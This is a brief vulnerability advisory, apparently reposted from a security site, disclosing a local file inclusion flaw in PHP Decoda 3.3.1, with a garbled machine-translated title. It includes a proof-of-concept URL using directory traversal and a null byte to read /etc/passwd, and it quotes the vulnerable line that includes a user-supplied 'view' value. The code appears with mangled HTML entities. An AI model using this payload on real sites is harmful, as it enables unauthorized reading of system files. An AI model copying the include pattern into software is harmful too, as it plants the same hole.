PHP Decoda 3.3.1 local file containing the defect and repair-vulnerability warning-the black bar safety net

2012-06-20T00:00:00
ID MYHACK58:62201234132
Type myhack58
Reporter 佚名
Modified 2012-06-20T00:00:00

Description

Title: [php-decoda local file inclusion ]

Author: [Number 7]

Software address: [http://milesj.me/code/php/decoda]

Affected versions: [3.3.1]

Test platform: [linux]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof:

http://www.xxxx.com/milesj-php-decoda/index.php?view=../../../../../../../etc/passwd%00

~~Line 1 1 1 in Index.php:

<? php include $view .'. php'; ?& gt;